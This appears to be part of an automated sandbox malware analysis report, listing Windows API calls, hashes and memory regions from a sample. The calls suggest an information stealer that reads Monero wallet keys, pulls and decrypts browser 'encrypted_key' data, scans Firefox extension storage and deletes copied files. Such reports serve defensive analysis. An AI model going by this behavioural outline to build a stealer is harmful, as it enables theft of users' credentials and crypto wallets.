                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: 5e911dc4bd5b07d62345a50bd58ebb82ae1278863fdfbb5b6960a65f94d02190
                    • Instruction ID: e9a096f9f174ac0cf34bd206b40b076379726202c857acc9e731a8f3b731c6b5
                    • Opcode Fuzzy Hash: 5e911dc4bd5b07d62345a50bd58ebb82ae1278863fdfbb5b6960a65f94d02190
                    • Instruction Fuzzy Hash: 240136B5A40208BBDB00DFE0DD89FAEB7BCEB48701F008155FA05D7280DA749A018F91
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: String___crt$Type
                    • String ID:
                    • API String ID: 2109742289-3916222277
                    • Opcode ID: d4493d971c162e5fd9a6909475ad764fe51e11c19670898fced6e49caf57a8a0
                    • Instruction ID: db7bdf45461523f61ea20c386c8fb5430a4c538c325cad495c2dd362dc933cdb
                    • Opcode Fuzzy Hash: d4493d971c162e5fd9a6909475ad764fe51e11c19670898fced6e49caf57a8a0
                    • Instruction Fuzzy Hash: 7841D4B150079C5EDB318B24CD84FFBBBEDAF45704F1448A8E9CA97182E271AA44DF60
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00966663
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00966726
                    • ExitProcess.KERNEL32 ref: 00966755
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                    • String ID: <
                    • API String ID: 1148417306-4251816714
                    • Opcode ID: 6d0d7bcb534b71f6620b975d34ff108fc095ad524e231a7a3f11a8a6a93cd399
                    • Instruction ID: 45b718ab5afcc3402414e383aae297f1f5b46af8360d45a7784d98e83b838566
                    • Opcode Fuzzy Hash: 6d0d7bcb534b71f6620b975d34ff108fc095ad524e231a7a3f11a8a6a93cd399
                    • Instruction Fuzzy Hash: 2B3129B1901218AADB14EB90DD96BDEB778AF94300F40418AF20977191DF746B48CFAA
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00970E28,00000000,?), ref: 0096882F
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00968836
                    • wsprintfA.USER32 ref: 00968850
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                    • String ID: %dx%d
                    • API String ID: 1695172769-2206825331
                    • Opcode ID: 00ec8b0eee01c5631145255627713236f3370d8c7741f1f0ca2d3d2cc4b32d39
                    • Instruction ID: 8a21436e0236dff3d23e0fd6716b88fc61102a75575aaff61f4903582b67a25c
                    • Opcode Fuzzy Hash: 00ec8b0eee01c5631145255627713236f3370d8c7741f1f0ca2d3d2cc4b32d39
                    • Instruction Fuzzy Hash: F32112B1E40204AFDB04DFD4DD49FAEBBB8FB48711F104159F605A7290CB79A901CBA1
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0096951E,00000000), ref: 00968D5B
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00968D62
                    • wsprintfW.USER32 ref: 00968D78
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesswsprintf
                    • String ID: %hs
                    • API String ID: 769748085-2783943728
                    • Opcode ID: fc83579afd650395a9fb4c61514eb37a0cd958cf7ca8f727f7e631f493bd7119
                    • Instruction ID: ccea7aa55ce3cb09e8179603611bb8db6633483aa9e94c746679280407e500bf
                    • Opcode Fuzzy Hash: fc83579afd650395a9fb4c61514eb37a0cd958cf7ca8f727f7e631f493bd7119
                    • Instruction Fuzzy Hash: EEE0ECB5A40208FBD710DBD4DE4AE6977B8EB44702F004195FD0997380DE759E109B96
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 00968B60: GetSystemTime.KERNEL32(00970E1A,005BA900,009705AE,?,?,009513F9,?,0000001A,00970E1A,00000000,?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 00968B86
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0095A2E1
                    • lstrlen.KERNEL32(00000000,00000000), ref: 0095A3FF
                    • lstrlen.KERNEL32(00000000), ref: 0095A6BC
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                    • DeleteFileA.KERNEL32(00000000), ref: 0095A743
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 4eb30413ca134df3c70cc2e45af021c650ca27135bca0b504e0fe7c52940af29
                    • Instruction ID: 6ea0305beac90527e0c055ae414a6d15cb3cf87ac6d57b85a723c6c371c1cf9b
                    • Opcode Fuzzy Hash: 4eb30413ca134df3c70cc2e45af021c650ca27135bca0b504e0fe7c52940af29
                    • Instruction Fuzzy Hash: B9E1AB728101189ADB09FBA4DD96FEE7338AF94300F508169F516770A1EF346A4DCFA6
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 00968B60: GetSystemTime.KERNEL32(00970E1A,005BA900,009705AE,?,?,009513F9,?,0000001A,00970E1A,00000000,?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 00968B86
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0095D481
                    • lstrlen.KERNEL32(00000000), ref: 0095D698
                    • lstrlen.KERNEL32(00000000), ref: 0095D6AC
                    • DeleteFileA.KERNEL32(00000000), ref: 0095D72B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 095a21f993c07c5238fb2cd2a9119ebd628bb61b17fbaa105035872dbe54e639
                    • Instruction ID: e365616e049718ee4620921fce0ec1f8c1ff95d11f8701f92161d4abb0ae6d08
                    • Opcode Fuzzy Hash: 095a21f993c07c5238fb2cd2a9119ebd628bb61b17fbaa105035872dbe54e639
                    • Instruction Fuzzy Hash: DE91CC729101089BDB04FBA4DD96FEE7339AF94300F508169F516B70A1EF346A49CFA6
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 00968B60: GetSystemTime.KERNEL32(00970E1A,005BA900,009705AE,?,?,009513F9,?,0000001A,00970E1A,00000000,?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 00968B86
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0095D801
                    • lstrlen.KERNEL32(00000000), ref: 0095D99F
                    • lstrlen.KERNEL32(00000000), ref: 0095D9B3
                    • DeleteFileA.KERNEL32(00000000), ref: 0095DA32
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 2e123ef48713bb1f7198de0846eb6abd027beac219f1ea75100d08374db3352f
                    • Instruction ID: 979c365a6973ab0e403dae73016821a7d92c7537f954377b52776647991416d4
                    • Opcode Fuzzy Hash: 2e123ef48713bb1f7198de0846eb6abd027beac219f1ea75100d08374db3352f
                    • Instruction Fuzzy Hash: BA81BA729101089BDB08FBA4DD96FEE7339AF94300F504569F506B71A1EF346A09CFA6
                    APIs
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 009599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009599EC
                      • Part of subcall function 009599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A11
                      • Part of subcall function 009599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00959A31
                      • Part of subcall function 009599C0: ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959A5A
                      • Part of subcall function 009599C0: LocalFree.KERNEL32(0095148F), ref: 00959A90
                      • Part of subcall function 009599C0: CloseHandle.KERNEL32(000000FF), ref: 00959A9A
                      • Part of subcall function 00968E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00968E52
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00971580,00970D92), ref: 0095F54C
                    • lstrlen.KERNEL32(00000000), ref: 0095F56B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                    • String ID: ^userContextId=4294967295$moz-extension+++
                    • API String ID: 998311485-3310892237
                    • Opcode ID: 4d7f78b42761aa6c9691e49b57f6e25912997402fa00e31f3be10b838ee4d548
                    • Instruction ID: af47bb65e728e50f9ee4643bba68880bbcb22a25f6e22fd7e5019793a2d388e0
                    • Opcode Fuzzy Hash: 4d7f78b42761aa6c9691e49b57f6e25912997402fa00e31f3be10b838ee4d548
                    • Instruction Fuzzy Hash: 65510E72D10108AADB04FFA4DC96EEE7378AFD4340F508529F91677191EE346A09CFA6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen
                    • String ID:
                    • API String ID: 367037083-0
                    • Opcode ID: 68d3786efab0c1806f5feadb3f9fcbe910c08a196b32e5e950a6905beab6334d
                    • Instruction ID: 8ebad07793ff7e4e8819da980ecaf85d8a19fdbd596244a291b634e525ee7cc7
                    • Opcode Fuzzy Hash: 68d3786efab0c1806f5feadb3f9fcbe910c08a196b32e5e950a6905beab6334d
                    • Instruction Fuzzy Hash: AE413DB1D10109EBCB04EFA4D896AEEB778EF94304F00C419E41677291EB75AA05CFA2
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 009599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009599EC
                      • Part of subcall function 009599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A11
                      • Part of subcall function 009599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00959A31
                      • Part of subcall function 009599C0: ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959A5A
                      • Part of subcall function 009599C0: LocalFree.KERNEL32(0095148F), ref: 00959A90
                      • Part of subcall function 009599C0: CloseHandle.KERNEL32(000000FF), ref: 00959A9A
                      • Part of subcall function 00968E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00968E52
                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00959D39
                      • Part of subcall function 00959AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00954EEE,00000000,00000000), ref: 00959AEF
                      • Part of subcall function 00959AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00954EEE,00000000,?), ref: 00959B01
                      • Part of subcall function 00959AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00954EEE,00000000,00000000), ref: 00959B2A
                      • Part of subcall function 00959AC0: LocalFree.KERNEL32(?,?,?,?,00954EEE,00000000,?), ref: 00959B3F
                      • Part of subcall function 00959B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00959B84
                      • Part of subcall function 00959B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00959BA3
                      • Part of subcall function 00959B60: LocalFree.KERNEL32(?), ref: 00959BD3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
